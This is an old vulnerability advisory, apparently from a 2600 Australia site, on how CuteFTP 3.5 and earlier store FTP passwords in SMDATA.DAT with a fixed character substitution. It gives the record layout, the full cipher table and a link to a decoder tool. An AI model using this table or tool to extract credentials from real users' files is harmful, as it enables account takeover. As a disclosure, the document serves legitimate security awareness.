Vulnerability in CuteFTP's password storage
-------------------------------------------

by black-hand, November 1999 / January 2000

Intro:
------

CuteFTP stores passwords using a simple character substitution, with
an encryption table that is easily derived, passwords can be extracted

Using this technique an attacker can extract usernames and passwords for
stored sites after obtaining the SMDATA.DAT file either locally or
remotely using a trojan or other technique

Applies to:
-----------

CuteFTP 3.5 and earlier versions

Discussion:
-----------

CuteFTP has an option of storing FTP sites for quick access to sites
at a later stage. In a sites record all the sites information including
the relevant IP address, username and password. This is all stored in
the SMDATA.DAT file which can be found in the CuteFTP directory. The
password is stored in this database using a simple ASCII substitution
between plaintext and ciphertext.  This substitution is the same for
all user records.

SMDATA.DAT by default is located at:  C:\Program Files\CuteFTP\SMDATA.DAT

Exploit:
--------

Opening up the SMDATA.DAT file in an editor shows every record, and towards
the end user records are stored. An example of such records taken from
a SMDATA.DAT are:

$^À^DTestftp.test.com^Duser^H©ª«^É^Ê^Ëö÷   ^B ^Ý     ^U ^B ^?^?^?^?^B ^B ^B ^B
    ^B   ^A
 ^B $^À^Dtest2www.test.com^Dtest^H¸©»»¿§º¬^Yinnitial remote directory^Qinitial
directory comments^B ^Ý !   ç^Cd ×zY^A^B ^B ^B ^B     ^B ^Vlocal directory filt
er^[
remotee directory filteeeer^A
     ^B

The $ sign signifies a new record, and this is followed by a number of
fields which are delimited by a different ASCII character each time (you
will need  a compatible viewer to see some ASCII characters). The records
are stored in this format

$^À^DRECORD NAMEIP ADDRESS^DUSERNAME^HENCRYPTED PASSWORD^B ^Ý

For instance in the first record, you can read off the first line this
information:

RECORD NAME = Test
IP ADDRESS = ftp.test.com
USERNAME = user
PASSWORD = ©ª«^É^Ê^Ëö÷

and the rest of the fields are left blank or contain little or no
information (this advises that the client should use default values).
Note that the port number field is blank as well.

So, by enciphering a known plaintest and analysing it, the means of enciphermen
t
can be easily deduced.  The above example shows the password abcABC>?
enciphered, the result in the records database is ©ª«^É^Ê^Ëö÷ . From this you
can deduce that a=© b=ª and so forth (note that it is case-sensitive)

Therefore, when enciphering the following string:

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()`~-=\[]
';,./_+|{}:"<>?

we get:

^É^Ê^Ë^Ì^Í^Î^Ï^À^Á^Â^Ã^Ä^Å^Æ^Ç^Ø^Ù^Ú^Û^Ü^Ý^Þ^ß^Ð^Ñ^Ò©ª«¬®¯ ¡¢£¤¥¦§¸¹º»¼½¾¿°±²ùú
ûüýþ^?ðñøé^Èëìí^Öîâàᨶåõ^Ô^Ó^Õïóäæç^×ã´³µòêôö÷

it's trivial to reverse the values from the SMDATA.DAT file and deduce the
user's password.

If an intruder has network or physical access to the SMDATA.DAT file in your
CuteFTP directory, then your passwords are compromised. The intruder will be
able to extract all necasssery information from the SMDATA.DAT to break into
your account. The SMDATA.DAT file is typicaly ~17k in size, depending on the
number of entries.

Program to Exploit:
-------------------

A VB-based application is available to reverse CuteFTP
derived ciphertext passwords.  The TABLE.DAT file included
consists of a single 188 character line of information, consisting
of firstly the plaintext characters followed by the ciphertext.
A simple substitution is mode from one fo the other.

To use, open up SMDATA.DAT file, and copy the password
information and paste it into the program to reveal the
password. The encrypted passwords can be found between
the ^H and ^B characters (ASCII values 8 and 2 respectively).
The result is placed into TABLE.DAT (open it with a text exitor)

The exploit (zipped) is downloadable at:

        https://www.2600.org.au/advisories/cuteftp-1199.zip

An example of a SMDATA.DAT file can be downloaded at

        https://www.2600.org.au/advisories/smdata.dat
        
Note:
-----

There are several older "CuteFTP Password Crackers" available from
various internet  sites.  Given that source is not available for
these and the fact that they make specific reference to "version
1.6/1.8", it is not known if this is the same exploit.


Contact:
--------

I can be contacteed on black_hand@2600.org.au
homepage at https://asio.wiretapped.net/~apis

-black-hand